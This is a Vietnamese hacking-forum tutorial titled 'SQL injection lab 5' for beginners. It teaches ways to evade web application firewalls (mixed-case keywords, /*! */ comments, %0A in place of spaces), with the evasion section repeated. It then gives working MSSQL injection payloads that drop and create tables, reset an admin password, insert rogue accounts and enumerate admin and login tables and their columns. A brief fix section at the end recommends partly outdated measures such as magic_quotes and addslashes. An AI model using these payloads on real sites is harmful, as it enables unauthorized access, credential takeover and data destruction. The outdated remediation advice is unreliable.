[Tut] SQL injection lab 5 [Filter+tổng kết] - for Newbie

Discussion in 'Web Application Security & Hacking' started by Mickey, Dec 7, 2017.

  1. Mickey

    Mickey Hacking For Hacker Staff Member

    [Tut] SQL injection lab 5 [Filter+tổng kết] - for Newbie



    - Khi query 1 số site chặn các hàm union,select,convert...thì khi query nó trả về trang trắng, lúc này ta thay đổi 1 số chữ Hoa, thường xen kẽ nhau: UniON, SeLECt... hoặc conveter sang ascii
    - Khi query cũng có 1 số site trả về trang trắng, thì ta nhìn kỹ trên site nha,kể cả title site.Nếu ko thấy ae view source sẽ thấy
    - 1 số query table_name không hiện ra , ta unhex(hex(group_concat(table_name))
    - Khi query nó trả về thế này
    Forbidden
    You don't have permission to access /news.php on this server.
    Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

    Hoặc

    Not Acceptable
    An appropriate representation of the requested resource / could not be found on this server.
    Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request
    Thì ta dùng /*! */ (VD: /*!union*/ hoặc /*!select*/ hoặc information_schema./*!tables*/..vv)

    -Nếu query nó ra thế này:
    406 Not Acceptable
    This request is not acceptable Powered By LiteSpeed Web Server
    LiteSpeed Technologies is not responsible for administration and contents of this web site!

    Thì các bạn cần tư duy chút. VD: các bạn có thể thay space = %0A (kí tự xuống dòng) ..vv
    ==================================================================
    - Khi query 1 số site chặn các hàm union,select,convert...thì khi query nó trả về trang trắng, lúc này ta thay đổi 1 số chữ Hoa, thường xen kẽ nhau: UniON, SeLECt... hoặc conveter sang ascii
    - Khi query cũng có 1 số site trả về trang trắng, thì ta nhìn kỹ trên site nha,kể cả title site.Nếu ko thấy ae view source sẽ thấy
    - 1 số query table_name không hiện ra , ta unhex(hex(group_concat(table_name))
    - Khi query nó trả về thế này
    Forbidden
    You don't have permission to access /news.php on this server.
    Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

    Hoặc

    Not Acceptable
    An appropriate representation of the requested resource / could not be found on this server.
    Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request
    Thì ta dùng /*! */ (VD: /*!union*/ hoặc /*!select*/ hoặc information_schema./*!tables*/..vv)

    -Nếu query nó ra thế này:
    406 Not Acceptable
    This request is not acceptable Powered By LiteSpeed Web Server
    LiteSpeed Technologies is not responsible for administration and contents of this web site!

    Thì các bạn cần tư duy chút. VD: các bạn có thể thay space = %0A (kí tự xuống dòng) ..vv
    1 Số truy vấn khác
    -Tạo 1 table_name:

    ;drop table kingnuscreate table thanggiangho (id int identity,kingnusvarchar(99999)) insert into kingnusselect table_name from information_schema.tables--sp_password

    -Thay đổi pass admin: lấy vd trên nếu như username :kingnus/pass:ceh

    ;UPDATE table1 SET password = 'ceh' WHERE username='kingnus'--

    -Chèn 1 record mới vào table

    ;INSERT INTO 'table1' ('ID', 'username', 'password', 'details') VALUES (99,'kingnus','ceh','Online')--

    -Tìm tất cả các table có liên quan như: admin,user,member,account,login...

    and 1 = convert(int,(select top 1 table_name from information_schema.tables where table_name like '%admin%' or table_name like '%Member%' or table_name like '%User%' or table_name like '%account%' or table_name like '%login%'))--sp_password

    and 1 = convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('') and (table_name like '%25admin%25' or table_name like '%25Member%25' or table_name like '%25User%25' or table_name like '%25account%25' or table_name like '%25login%25')))--sp_password

    -Lấy tất cả các table_name:

    ; begin declare @temp varchar(8000) set @temp=':' select @[email protected]%2btable_name%2b'/' from information_schema.tables select @temp as id into kingnusend--

    or 1=(select id from kingnus)--

    ; drop table kingnus--

    -Lấy tất cả các column_name từ 1 table_name: vd table_name : tbadmin

    ; begin declare @temp varchar(8000) set @temp=':' select @[email protected]%2bcolumn_name%2b'/' from information_schema.columns where table_name='tbadmin' select @temp as id into kingnus end--

    or 1=(select id from kingnus)--

    ==================================================================
    I. Cách vá lỗi:
    1. Mởi php.ini và set magic_quotes_gcp thành On
    Nó sẽ chèn “\” trước (‘) có trong:
    -COOKIE
    -POST
    -GET

    2. Sử dụng hàm addslashes() để “gói” chuỗi bằng dấu “/”

    3. Sử dụng hàm htmlspecialchars(), mysql_escape_string() … để mã hoá kí tự đặc biệt trong câu truy vấn

    4. Ép kiểu:
    - Ta biết id của một đối tượng (user, category, box, product …) luôn là kiểu số nguyên, vì vậy ta dùng:
    Quote:
    $id = (int)$_POST['id'];
    hoặc
    $id = (int)$_GET['id'];
    Giải thích về vá lỗi :
    3 cách đầu: Nếu nhập vào abc’ đi , thì nó sẽ hiểu là một chuỗi chứ không phải là abc rồi dấu ‘ riêng
    Cách thứ 4: là nếu nhập chuỗi thì nó ép thành số tương ứng, mà số thì . . .
    ==================================================================
    Hết Lab 5:
     

Share This Page